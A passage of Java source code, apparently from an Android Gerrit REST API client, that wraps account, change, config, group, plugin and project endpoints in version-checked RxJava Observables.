withVersionRequestCheck(Observable.fromCallable( () -> mService.getAccountCapabilities(accountId, filterByVersion(filter)) .toBlocking().first())); } @Override public Observable<String> hasAccountCapability( @NonNull String accountId, @NonNull Capability capabilityId) { return withVersionRequestCheck(mService.hasAccountCapability(accountId, capabilityId)); } @Override public Observable<List<GroupInfo>> getAccountGroups(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountGroups(accountId)); } @Override public Observable<ResponseBody> getAccountAvatar( @NonNull String accountId, @Nullable Integer size) { return withVersionRequestCheck(mService.getAccountAvatar(accountId, size)); } @Override public Observable<String> getAccountAvatarChangeUrl(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountAvatarChangeUrl(accountId)); } @Override public Observable<PreferencesInfo> getAccountPreferences(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountPreferences(accountId)); } @Override public Observable<PreferencesInfo> setAccountPreferences( @NonNull String accountId, @NonNull PreferencesInput input) { return withVersionRequestCheck(mService.setAccountPreferences(accountId, input)); } @Override public Observable<DiffPreferencesInfo> getAccountDiffPreferences(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountDiffPreferences(accountId)); } @Override public Observable<DiffPreferencesInfo> setAccountDiffPreferences( @NonNull String accountId, @NonNull DiffPreferencesInput input) { return withVersionRequestCheck(mService.setAccountDiffPreferences(accountId, input)); } @Override public Observable<EditPreferencesInfo> getAccountEditPreferences(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountEditPreferences(accountId)); } @Override public Observable<EditPreferencesInfo> setAccountEditPreferences( @NonNull String accountId, @NonNull EditPreferencesInput input) { return withVersionRequestCheck(mService.setAccountEditPreferences(accountId, input)); } @Override public Observable<List<ProjectWatchInfo>> getAccountWatchedProjects(@NonNull String accountId) { return withVersionRequestCheck(mService.getAccountWatchedProjects(accountId)); } @Override public Observable<List<ProjectWatchInfo>> addOrUpdateAccountWatchedProjects( @NonNull String accountId, @NonNull List<ProjectWatchInput> input) { return withVersionRequestCheck(mService.addOrUpdateAccountWatchedProjects(accountId, input)); } @Override public Observable<Void> deleteAccountWatchedProjects( @NonNull String accountId, @NonNull List<DeleteProjectWatchInput> input) { return withVersionRequestCheck(mService.deleteAccountWatchedProjects(accountId, input)); } @Override public Observable<List<ChangeInfo>> getDefaultStarredChanges(@NonNull String accountId) { return withVersionRequestCheck(mService.getDefaultStarredChanges(accountId)); } @Override public Observable<Void> putDefaultStarOnChange( @NonNull String accountId, @NonNull String changeId) { return withVersionRequestCheck(mService.putDefaultStarOnChange(accountId, changeId)); } @Override public Observable<Void> deleteDefaultStarFromChange( @NonNull String accountId, @NonNull String changeId) { return withVersionRequestCheck(mService.deleteDefaultStarFromChange(accountId, changeId)); } @Override public Observable<List<ChangeInfo>> getStarredChanges(@NonNull String accountId) { return withVersionRequestCheck(mService.getStarredChanges(accountId)); } @Override public 
Observable<List<String>> getStarLabelsFromChange( @NonNull String accountId, @NonNull String changeId) { return withVersionRequestCheck(mService.getStarLabelsFromChange(accountId, changeId)); } @Override public Observable<List<String>> updateStarLabelsFromChange(@NonNull String accountId, @NonNull String changeId, @NonNull StarInput input) { return withVersionRequestCheck(mService.updateStarLabelsFromChange(accountId, changeId, input)); } @Override public Observable<List<ContributorAgreementInfo>> getContributorAgreements( @NonNull String accountId) { return withVersionRequestCheck(mService.getContributorAgreements(accountId)); } @Override public Observable<String> signContributorAgreement( @NonNull String accountId, @NonNull ContributorAgreementInput input) { return withVersionRequestCheck(mService.signContributorAgreement(accountId, input)); } // =============================== // Gerrit changes endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-changes.html" // =============================== @Override public Observable<ChangeInfo> createChange(@NonNull ChangeInput input) { return withVersionRequestCheck(mService.createChange(input)); } @Override public Observable<List<ChangeInfo>> getChanges( @NonNull ChangeQuery query, @Nullable Integer count, @Nullable Integer start, @Nullable List<ChangeOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getChanges(query, count, start, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<ChangeInfo> getChange( @NonNull String changeId, @Nullable List<ChangeOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getChange(changeId, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<ChangeInfo> getChangeDetail( @NonNull String changeId, @Nullable List<ChangeOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getChangeDetail(changeId, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<String> getChangeTopic(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeTopic(changeId)); } @Override public Observable<String> setChangeTopic(@NonNull String changeId, @NonNull TopicInput input) { return withVersionRequestCheck(mService.setChangeTopic(changeId, input)); } @Override public Observable<Void> deleteChangeTopic(@NonNull String changeId) { return withVersionRequestCheck(mService.deleteChangeTopic(changeId)); } @Override public Observable<ChangeInfo> abandonChange( @NonNull String changeId, @NonNull AbandonInput input) { return withVersionRequestCheck(mService.abandonChange(changeId, input)); } @Override public Observable<ChangeInfo> restoreChange( @NonNull String changeId, @NonNull RestoreInput input) { return withVersionRequestCheck(mService.restoreChange(changeId, input)); } @Override public Observable<ChangeInfo> rebaseChange( @NonNull String changeId, @Nullable RebaseInput input) { return withVersionRequestCheck(mService.rebaseChange(changeId, input)); } @Override public Observable<ChangeInfo> moveChange( @NonNull String changeId, @NonNull MoveInput input) { return withVersionRequestCheck(mService.moveChange(changeId, input)); } @Override public Observable<ChangeInfo> revertChange( @NonNull String changeId, @NonNull RevertInput input) { return withVersionRequestCheck(mService.revertChange(changeId, input)); } @Override public Observable<ChangeInfo> submitChange( @NonNull String changeId, @NonNull 
SubmitInput input) { return withVersionRequestCheck(mService.submitChange(changeId, input)); } @Override public Observable<List<ChangeInfo>> getChangesSubmittedTogether( @NonNull String changeId, @Nullable List<SubmittedTogetherOptions> options) { return withVersionRequestCheck(mService.getChangesSubmittedTogether(changeId, options)); } @Override public Observable<Void> publishDraftChange(@NonNull String changeId) { return withVersionRequestCheck(mService.publishDraftChange(changeId)); } @Override public Observable<Void> deleteDraftChange(@NonNull String changeId) { return withVersionRequestCheck(mService.deleteDraftChange(changeId)); } @Override public Observable<IncludeInInfo> getChangeIncludedIn(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeIncludedIn(changeId)); } @Override public Observable<Void> indexChange(@NonNull String changeId) { return withVersionRequestCheck(mService.indexChange(changeId)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeComments(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeComments(changeId)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeDraftComments( @NonNull String changeId) { return withVersionRequestCheck(mService.getChangeDraftComments(changeId)); } @Override public Observable<ChangeInfo> checkChange(@NonNull String changeId) { return withVersionRequestCheck(mService.checkChange(changeId)); } @Override public Observable<ChangeInfo> fixChange(@NonNull String changeId, @NonNull FixInput input) { return withVersionRequestCheck(mService.fixChange(changeId, input)); } @Override public Observable<EditInfo> getChangeEdit(@NonNull String changeId, @Nullable Option list, @Nullable String base, @Nullable Option downloadCommands) { return withVersionRequestCheck(mService.getChangeEdit( changeId, list, base, downloadCommands)); } @Override public Observable<Void> setChangeEdit( @NonNull String changeId, @NonNull String fileId, @NonNull RequestBody data) { return withVersionRequestCheck(mService.setChangeEdit(changeId, fileId, data)); } @Override public Observable<Void> restoreChangeEdit( @NonNull String changeId, @NonNull RestoreChangeEditInput input) { return withVersionRequestCheck(mService.restoreChangeEdit(changeId, input)); } @Override public Observable<Void> renameChangeEdit( @NonNull String changeId, @NonNull RenameChangeEditInput input) { return withVersionRequestCheck(mService.renameChangeEdit(changeId, input)); } @Override public Observable<Void> newChangeEdit( @NonNull String changeId, @NonNull NewChangeEditInput input) { return withVersionRequestCheck(mService.newChangeEdit(changeId, input)); } @Override public Observable<Void> deleteChangeEditFile(@NonNull String changeId, @NonNull String fileId) { return withVersionRequestCheck(mService.deleteChangeEditFile(changeId, fileId)); } @Override public Observable<Base64Data> getChangeEditFileContent( @NonNull String changeId, @NonNull String fileId, @Nullable String base) { return withVersionRequestCheck(mService.getChangeEditFileContent(changeId, fileId, base)); } @Override public Observable<EditFileInfo> getChangeEditFileMetadata( @NonNull String changeId, @NonNull String fileId) { return withVersionRequestCheck(mService.getChangeEditFileMetadata(changeId, fileId)); } @Override public Observable<String> getChangeEditMessage(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeEditMessage(changeId)); } @Override public Observable<Void> setChangeEditMessage( @NonNull String 
changeId, @NonNull ChangeEditMessageInput input) { return withVersionRequestCheck(mService.setChangeEditMessage(changeId, input)); } @Override public Observable<Void> publishChangeEdit(@NonNull String changeId) { return withVersionRequestCheck(mService.publishChangeEdit(changeId)); } @Override public Observable<Void> rebaseChangeEdit(@NonNull String changeId) { return withVersionRequestCheck(mService.rebaseChangeEdit(changeId)); } @Override public Observable<Void> deleteChangeEdit(@NonNull String changeId) { return withVersionRequestCheck(mService.deleteChangeEdit(changeId)); } @Override public Observable<List<ReviewerInfo>> getChangeReviewers(@NonNull String changeId) { return withVersionRequestCheck(mService.getChangeReviewers(changeId)); } @Override public Observable<List<SuggestedReviewerInfo>> getChangeSuggestedReviewers( @NonNull String changeId, @NonNull String query, @Nullable Integer count) { return withVersionRequestCheck( mService.getChangeSuggestedReviewers(changeId, query, count)); } @Override public Observable<List<ReviewerInfo>> getChangeReviewer( @NonNull String changeId, @NonNull String accountId) { return withVersionRequestCheck(mService.getChangeReviewer(changeId, accountId)); } @Override public Observable<AddReviewerResultInfo> addChangeReviewer( @NonNull String changeId, @NonNull ReviewerInput input) { return withVersionRequestCheck(mService.addChangeReviewer(changeId, input)); } @Override public Observable<Void> deleteChangeReviewer( @NonNull String changeId, @NonNull String accountId) { return withVersionRequestCheck(mService.deleteChangeReviewer(changeId, accountId)); } @Override public Observable<Map<String, Integer>> getChangeReviewerVotes( @NonNull String changeId, @NonNull String accountId) { return withVersionRequestCheck(mService.getChangeReviewerVotes(changeId, accountId)); } @Override public Observable<Void> deleteChangeReviewerVote(@NonNull String changeId, @NonNull String accountId, @NonNull String labelId, @NonNull DeleteVoteInput input) { return withVersionRequestCheck( mService.deleteChangeReviewerVote(changeId, accountId, labelId, input)); } @Override public Observable<CommitInfo> getChangeRevisionCommit( @NonNull String changeId, @NonNull String revisionId, @Nullable Option links) { return withVersionRequestCheck( mService.getChangeRevisionCommit(changeId, revisionId, links)); } @Override public Observable<Map<String, ActionInfo>> getChangeRevisionActions( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionActions(changeId, revisionId)); } @Override public Observable<ChangeInfo> getChangeRevisionReview( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionReview(changeId, revisionId)); } @Override public Observable<ReviewInfo> setChangeRevisionReview(@NonNull String changeId, @NonNull String revisionId, @NonNull ReviewInput input) { return withVersionRequestCheck( mService.setChangeRevisionReview(changeId, revisionId, input)); } @Override public Observable<RelatedChangesInfo> getChangeRevisionRelatedChanges( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck( mService.getChangeRevisionRelatedChanges(changeId, revisionId)); } @Override public Observable<ChangeInfo> rebaseChangeRevision( @NonNull String changeId, @NonNull String revisionId, @NonNull RebaseInput input) { return withVersionRequestCheck(mService.rebaseChangeRevision(changeId, revisionId, input)); } @Override public 
Observable<SubmitInfo> submitChangeRevision( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.submitChangeRevision(changeId, revisionId)); } @Override public Observable<SubmitInfo> publishChangeDraftRevision( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.publishChangeDraftRevision(changeId, revisionId)); } @Override public Observable<SubmitInfo> deleteChangeDraftRevision( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.deleteChangeDraftRevision(changeId, revisionId)); } @Override public Observable<Base64Data> getChangeRevisionPatch(@NonNull String changeId, @NonNull String revisionId, @Nullable Option zip, @Nullable Option download) { return withVersionRequestCheck( mService.getChangeRevisionPatch(changeId, revisionId, zip, download)); } @Override public Observable<MergeableInfo> getChangeRevisionMergeableStatus(@NonNull String changeId, @NonNull String revisionId, @Nullable Option otherBranches) { return withVersionRequestCheck( mService.getChangeRevisionMergeableStatus(changeId, revisionId, otherBranches)); } @Override public Observable<SubmitType> getChangeRevisionSubmitType( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionSubmitType(changeId, revisionId)); } @Override public Observable<SubmitType> testChangeRevisionSubmitType(@NonNull String changeId, @NonNull String revisionId, @NonNull RuleInput input) { return withVersionRequestCheck( mService.testChangeRevisionSubmitType(changeId, revisionId, input)); } @Override public Observable<List<SubmitRecordInfo>> testChangeRevisionSubmitRule( @NonNull String changeId, @NonNull String revisionId, @NonNull RuleInput input) { return withVersionRequestCheck( mService.testChangeRevisionSubmitRule(changeId, revisionId, input)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeRevisionDrafts( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck( mService.getChangeRevisionDrafts(changeId, revisionId)); } @Override public Observable<CommentInfo> createChangeRevisionDraft( @NonNull String changeId, @NonNull String revisionId, @NonNull CommentInput input) { return withVersionRequestCheck( mService.createChangeRevisionDraft(changeId, revisionId, input)); } @Override public Observable<CommentInfo> getChangeRevisionDraft( @NonNull String changeId, @NonNull String revisionId, @NonNull String draftId) { return withVersionRequestCheck( mService.getChangeRevisionDraft(changeId, revisionId, draftId)); } @Override public Observable<CommentInfo> updateChangeRevisionDraft(@NonNull String changeId, @NonNull String revisionId, @NonNull String draftId, @NonNull CommentInput input) { return withVersionRequestCheck( mService.updateChangeRevisionDraft(changeId, revisionId, draftId, input)); } @Override public Observable<Void> deleteChangeRevisionDraft( @NonNull String changeId, @NonNull String revisionId, @NonNull String draftId) { return withVersionRequestCheck( mService.deleteChangeRevisionDraft(changeId, revisionId, draftId)); } @Override public Observable<Map<String, List<CommentInfo>>> getChangeRevisionComments( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionComments(changeId, revisionId)); } @Override public Observable<CommentInfo> getChangeRevisionComment(@NonNull String changeId, @NonNull String revisionId, @NonNull String commentId) 
{ return withVersionRequestCheck( mService.getChangeRevisionComment(changeId, revisionId, commentId)); } @Override public Observable<Map<String, FileInfo>> getChangeRevisionFiles( @NonNull String changeId, @NonNull String revisionId) { return withVersionRequestCheck(mService.getChangeRevisionFiles(changeId, revisionId)); } @Override public Observable<ResponseBody> getChangeRevisionFileContent(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId) { return withVersionRequestCheck( mService.getChangeRevisionFileContent(changeId, revisionId, fileId)); } @Override public Observable<ResponseBody> getChangeRevisionFileDownload(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId, @Nullable SuffixMode suffixMode, @Nullable Integer parent) { return withVersionRequestCheck(mService.getChangeRevisionFileDownload( changeId, revisionId, fileId, suffixMode, parent)); } @Override public Observable<DiffInfo> getChangeRevisionFileDiff(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId, @Nullable Integer base, @Nullable Option intraline, @Nullable Option weblinksOnly, @Nullable WhitespaceType whitespace, @Nullable IgnoreWhitespaceType ignoreWhitespace, @Nullable ContextType context) { return withVersionRequestCheck(mService.getChangeRevisionFileDiff(changeId, revisionId, fileId, base, intraline, weblinksOnly, mMediator.resolveWhiteSpaceType(whitespace), mMediator.resolveIgnoreWhiteSpaceType(ignoreWhitespace), context)); } @Override public Observable<BlameInfo> getChangeRevisionFileBlame(@NonNull String changeId, @NonNull String revisionId, @NonNull String fileId, @Nullable String base) { return withVersionRequestCheck( mService.getChangeRevisionFileBlame(changeId, revisionId, fileId, base)); } @Override public Observable<Void> setChangeRevisionFileAsReviewed( @NonNull String changeId, @NonNull String revisionId, @NonNull String fileId) { return withVersionRequestCheck( mService.setChangeRevisionFileAsReviewed(changeId, revisionId, fileId)); } @Override public Observable<Void> setChangeRevisionFileAsNotReviewed( @NonNull String changeId, @NonNull String revisionId, @NonNull String fileId) { return withVersionRequestCheck( mService.setChangeRevisionFileAsNotReviewed(changeId, revisionId, fileId)); } @Override public Observable<ChangeInfo> cherryPickChangeRevision(@NonNull String changeId, @NonNull String revisionId, @NonNull CherryPickInput input) { return withVersionRequestCheck( mService.cherryPickChangeRevision(changeId, revisionId, input)); } // =============================== // Gerrit configuration endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-config.html" // =============================== @Override public Observable<ServerVersion> getServerVersion() { return andCacheVersion(mService.getServerVersion()); } @Override public Observable<ServerInfo> getServerInfo() { return withVersionRequestCheck(mService.getServerInfo()); } @Override public Observable<Void> confirmEmail(@NonNull EmailConfirmationInput input) { return withVersionRequestCheck(mService.confirmEmail(input)); } @Override public Observable<Map<String, CacheInfo>> getServerCaches() { return withVersionRequestCheck(mService.getServerCaches()); } @Override public Observable<Void> executeServerCachesOperations(CacheOperationInput input) { return withVersionRequestCheck(mService.executeServerCachesOperations(input)); } @Override public Observable<CacheInfo> getServerCache(@NonNull String cacheId) { return 
withVersionRequestCheck(mService.getServerCache(cacheId)); } @Override public Observable<Void> flushServerCache(@NonNull String cacheId) { return withVersionRequestCheck(mService.flushServerCache(cacheId)); } @Override public Observable<SummaryInfo> getServerSummary(@Nullable Option jvm, @Nullable Option gc) { return withVersionRequestCheck(mService.getServerSummary(jvm, gc)); } @Override public Observable<Map<Capability, ServerCapabilityInfo>> getServerCapabilities() { return withVersionRequestCheck(mService.getServerCapabilities()); } @Override public Observable<List<TaskInfo>> getServerTasks() { return withVersionRequestCheck(mService.getServerTasks()); } @Override public Observable<TaskInfo> getServerTask(@NonNull String taskId) { return withVersionRequestCheck(mService.getServerTask(taskId)); } @Override public Observable<Void> deleteServerTask(@NonNull String taskId) { return withVersionRequestCheck(mService.deleteServerTask(taskId)); } @Override public Observable<List<TopMenuEntryInfo>> getServerTopMenus() { return withVersionRequestCheck(mService.getServerTopMenus()); } @Override public Observable<PreferencesInfo> getServerDefaultPreferences() { return withVersionRequestCheck(mService.getServerDefaultPreferences()); } @Override public Observable<PreferencesInfo> setServerDefaultPreferences( @NonNull PreferencesInput input) { return withVersionRequestCheck(mService.setServerDefaultPreferences(input)); } @Override public Observable<DiffPreferencesInfo> getServerDefaultDiffPreferences() { return withVersionRequestCheck(mService.getServerDefaultDiffPreferences()); } @Override public Observable<DiffPreferencesInfo> setServerDefaultDiffPreferences( @NonNull DiffPreferencesInput input) { return withVersionRequestCheck(mService.setServerDefaultDiffPreferences(input)); } // =============================== // Gerrit groups endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-groups.html" // =============================== @Override public Observable<List<GroupInfo>> getGroupSuggestions( @NonNull String query, @Nullable Integer count) { return withVersionRequestCheck(mService.getGroupSuggestions(query, count)); } @Override public Observable<List<GroupInfo>> getGroups( @Nullable GroupQuery query, @Nullable Integer count, @Nullable Integer start, @Nullable String project, @Nullable String user, @Nullable Option owned, @Nullable Option visibleToAll, @Nullable Option verbose, @Nullable List<GroupOptions> options) { return withVersionRequestCheck(Observable.fromCallable( () -> mService.getGroups(query, count, start, project, user, owned, visibleToAll, verbose, filterByVersion(options)) .toBlocking().first())); } @Override public Observable<GroupInfo> getGroup(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroup(groupId)); } @Override public Observable<GroupInfo> createGroup(@NonNull String groupName, @NonNull GroupInput input) { return withVersionRequestCheck(mService.createGroup(groupName, input)); } @Override public Observable<GroupInfo> getGroupDetail(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupDetail(groupId)); } @Override public Observable<String> getGroupName(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupName(groupId)); } @Override public Observable<String> setGroupName(@NonNull String groupId, @NonNull GroupNameInput input) { return withVersionRequestCheck(mService.setGroupName(groupId, input)); } @Override public Observable<String> getGroupDescription(@NonNull String groupId) { 
return withVersionRequestCheck(mService.getGroupDescription(groupId)); } @Override public Observable<String> setGroupDescription( @NonNull String groupId, @NonNull GroupDescriptionInput input) { return withVersionRequestCheck(mService.setGroupDescription(groupId, input)); } @Override public Observable<Void> deleteGroupDescription(@NonNull String groupId) { return withVersionRequestCheck(mService.deleteGroupDescription(groupId)); } @Override public Observable<GroupOptionsInfo> getGroupOptions(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupOptions(groupId)); } @Override public Observable<GroupOptionsInfo> setGroupOptions( @NonNull String groupId, @NonNull GroupOptionsInput input) { return withVersionRequestCheck(mService.setGroupOptions(groupId, input)); } @Override public Observable<GroupInfo> getGroupOwner(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupOwner(groupId)); } @Override public Observable<GroupInfo> setGroupOwner( @NonNull String groupId, @NonNull GroupOwnerInput input) { return withVersionRequestCheck(mService.setGroupOwner(groupId, input)); } @Override public Observable<List<GroupAuditEventInfo>> getGroupAuditLog(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupAuditLog(groupId)); } @Override public Observable<List<AccountInfo>> getGroupMembers( @NonNull String groupId, @Nullable Option recursive) { return withVersionRequestCheck(mService.getGroupMembers(groupId, recursive)); } @Override public Observable<AccountInfo> getGroupMember( @NonNull String groupId, @NonNull String accountId) { return withVersionRequestCheck(mService.getGroupMember(groupId, accountId)); } @Override public Observable<AccountInfo> addGroupMember( @NonNull String groupId, @NonNull String accountId) { return withVersionRequestCheck(mService.addGroupMember(groupId, accountId)); } @Override public Observable<List<AccountInfo>> addGroupMembers( @NonNull String groupId, @NonNull MemberInput input) { return withVersionRequestCheck(mService.addGroupMembers(groupId, input)); } @Override public Observable<Void> deleteGroupMember(@NonNull String groupId, @NonNull String accountId) { return withVersionRequestCheck(mService.deleteGroupMember(groupId, accountId)); } @Override public Observable<Void> deleteGroupMembers( @NonNull String groupId, @NonNull MemberInput input) { return withVersionRequestCheck(mService.deleteGroupMembers(groupId, input)); } @Override public Observable<List<GroupInfo>> getGroupIncludedGroups(@NonNull String groupId) { return withVersionRequestCheck(mService.getGroupIncludedGroups(groupId)); } @Override public Observable<GroupInfo> getGroupIncludedGroup( @NonNull String groupId, @NonNull String includedGroupId) { return withVersionRequestCheck(mService.getGroupIncludedGroup(groupId, includedGroupId)); } @Override public Observable<GroupInfo> addGroupIncludeGroup( @NonNull String groupId, @NonNull String includedGroupId) { return withVersionRequestCheck(mService.addGroupIncludeGroup(groupId, includedGroupId)); } @Override public Observable<GroupInfo> addGroupIncludeGroups( @NonNull String groupId, @NonNull IncludeGroupInput input) { return withVersionRequestCheck(mService.addGroupIncludeGroups(groupId, input)); } @Override public Observable<Void> deleteGroupIncludeGroup( @NonNull String groupId, @NonNull String includedGroupId) { return withVersionRequestCheck(mService.deleteGroupIncludeGroup(groupId, includedGroupId)); } @Override public Observable<Void> deleteGroupIncludeGroup( @NonNull String groupId, @NonNull 
IncludeGroupInput input) { return withVersionRequestCheck(mService.deleteGroupIncludeGroup(groupId, input)); } // =============================== // Gerrit plugins endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-plugins.html" // =============================== @Override public Observable<Map<String, PluginInfo>> getPlugins() { return withVersionRequestCheck(mService.getPlugins()); } @Override public Observable<PluginInfo> installPlugin( @NonNull String pluginId, @NonNull PluginInput input) { return withVersionRequestCheck(mService.installPlugin(pluginId, input)); } @Override public Observable<PluginInfo> getPluginStatus(@NonNull String pluginId) { return withVersionRequestCheck(mService.getPluginStatus(pluginId)); } @Override public Observable<PluginInfo> enablePlugin(@NonNull String pluginId) { return withVersionRequestCheck(mService.enablePlugin(pluginId)); } @Override public Observable<PluginInfo> disablePlugin(@NonNull String pluginId) { return withVersionRequestCheck(mService.disablePlugin(pluginId)); } @Override public Observable<PluginInfo> reloadPlugin(@NonNull String pluginId) { return withVersionRequestCheck(mService.reloadPlugin(pluginId)); } // =============================== // Gerrit projects endpoints // @link "https://gerrit-review.googlesource.com/Documentation/rest-api-projects.html" // =============================== @Override public Observable<Map<String, ProjectInfo>> getProjects(@Nullable Option showDescription, @Nullable Option showTree, @Nullable String branch, @Nullable ProjectType type, @Nullable String group) { return withVersionRequestCheck( mService.getProjects(showDescription, showTree, branch, type, group)); } @Override public Observable<ProjectInfo> getProject(@NonNull String projectName) { return withVersionRequestCheck(mService.getProject(projectName)); } @Override public Observable<ProjectInfo> createProject( @NonNull String projectName, @NonNull ProjectInput input) { return withVersionRequestCheck(mService.createProject(projectName, input)); } @Override public Observable<String> getProjectDescription(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectDescription(projectName)); } @Override public Observable<String> setProjectDescription( @NonNull String projectName, @NonNull ProjectDescriptionInput input) { return withVersionRequestCheck(mService.setProjectDescription(projectName, input)); } @Override public Observable<Void> deleteProjectDescription(@NonNull String projectName) { return withVersionRequestCheck(mService.deleteProjectDescription(projectName)); } @Override public Observable<String> getProjectParent(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectParent(projectName)); } @Override public Observable<String> setProjectParent( @NonNull String projectName, @NonNull ProjectParentInput input) { return withVersionRequestCheck(mService.setProjectParent(projectName, input)); } @Override public Observable<String> getProjectHead(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectHead(projectName)); } @Override public Observable<String> setProjectHead( @NonNull String projectName, @NonNull HeadInput input) { return withVersionRequestCheck(mService.setProjectHead(projectName, input)); } @Override public Observable<RepositoryStatisticsInfo> getProjectStatistics(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectStatistics(projectName)); } @Override public Observable<ConfigInfo> getProjectConfig(@NonNull 
String projectName) { return withVersionRequestCheck(mService.getProjectConfig(projectName)); } @Override public Observable<ConfigInfo> setProjectConfig( @NonNull String projectName, @NonNull ConfigInput input) { return withVersionRequestCheck(mService.setProjectConfig(projectName, input)); } @Override public Observable<ResponseBody> runProjectGc(@NonNull String projectName, @NonNull GcInput input) { return withVersionRequestCheck(mService.runProjectGc(projectName, input)); } @Override public Observable<BanResultInfo> banProject( @NonNull String projectName, @NonNull BanInput input) { return withVersionRequestCheck(mService.banProject(projectName, input)); } @Override public Observable<ProjectAccessInfo> getProjectAccessRights(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectAccessRights(projectName)); } @Override public Observable<ProjectAccessInfo> setProjectAccessRights( @NonNull String projectName, @NonNull ProjectAccessInput input) { return withVersionRequestCheck(mService.setProjectAccessRights(projectName, input)); } @Override public Observable<List<BranchInfo>> getProjectBranches(@NonNull String projectName, @Nullable Integer count, @Nullable Integer start, @Nullable String substring, @Nullable String regexp) { return withVersionRequestCheck( mService.getProjectBranches(projectName, count, start, substring, regexp)); } @Override public Observable<BranchInfo> getProjectBranch( @NonNull String projectName, @NonNull String branchId) { return withVersionRequestCheck(mService.getProjectBranch(projectName, branchId)); } @Override public Observable<BranchInfo> createProjectBranch( @NonNull String projectName, @NonNull String branchId, @NonNull BranchInput input) { return withVersionRequestCheck(mService.createProjectBranch(projectName, branchId, input)); } @Override public Observable<Void> deleteProjectBranch( @NonNull String projectName, @NonNull String branchId) { return withVersionRequestCheck(mService.deleteProjectBranch(projectName, branchId)); } @Override public Observable<Void> deleteProjectBranches( @NonNull String projectName, @NonNull DeleteBranchesInput input) { return withVersionRequestCheck(mService.deleteProjectBranches(projectName, input)); } @Override public Observable<Base64Data> getProjectBranchFileContent( @NonNull String projectName, @NonNull String branchId, @NonNull String fileId) { return withVersionRequestCheck( mService.getProjectBranchFileContent(projectName, branchId, fileId)); } @Override public Observable<MergeableInfo> getProjectBranchMergeableStatus(@NonNull String projectName, @NonNull String branchId, @NonNull String sourceBranchId, @Nullable MergeStrategy strategy) { return withVersionRequestCheck(mService.getProjectBranchMergeableStatus( projectName, branchId, sourceBranchId, strategy)); } @Override public Observable<List<ReflogEntryInfo>> getProjectBranchReflog( @NonNull String projectName, @NonNull String branchId) { return withVersionRequestCheck(mService.getProjectBranchReflog(projectName, branchId)); } @Override public Observable<List<ProjectInfo>> getProjectChildProjects(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectChildProjects(projectName)); } @Override public Observable<ProjectInfo> getProjectChildProject( @NonNull String projectName, @NonNull String childProjectName) { return withVersionRequestCheck( mService.getProjectChildProject(projectName, childProjectName)); } @Override public Observable<List<TagInfo>> getProjectTags(@NonNull String projectName) { return 
withVersionRequestCheck(mService.getProjectTags(projectName)); } @Override public Observable<TagInfo> getProjectTag(@NonNull String projectName, @NonNull String tagId) { return withVersionRequestCheck(mService.getProjectTag(projectName, tagId)); } @Override public Observable<TagInfo> createProjectTag( @NonNull String projectName, @NonNull String tagId, @NonNull TagInput input) { return withVersionRequestCheck(mService.createProjectTag(projectName, tagId, input)); } @Override public Observable<CommitInfo> getProjectCommit( @NonNull String projectName, @NonNull String commitId) { return withVersionRequestCheck(mService.getProjectCommit(projectName, commitId)); } @Override public Observable<Base64Data> getProjectCommitFileContent( @NonNull String projectName, @NonNull String commitId, @NonNull String fileId) { return withVersionRequestCheck( mService.getProjectCommitFileContent(projectName, commitId, fileId)); } @Override public Observable<List<DashboardInfo>> getProjectDashboards(@NonNull String projectName) { return withVersionRequestCheck(mService.getProjectDashboards(projectName)); } @Override public Observable<DashboardInfo> getProjectDashboard( @NonNull String projectName, @NonNull String dashboardId) { return withVersionRequestCheck(mService.getProjectDashboard(projectName, dashboardId)); } @Override public Observable<DashboardInfo> setProjectDashboard(@NonNull String projectName, @NonNull String dashboardId, @NonNull DashboardInput input) { return withVersionRequestCheck( mService.setProjectDashboard(projectName, dashboardId, input)); } @Override public Observable<Void> deleteProjectDashboard( @NonNull String projectName, @NonNull String dashboardId) { return withVersionRequestCheck(mService.deleteProjectDashboard(projectName, dashboardId)); } }
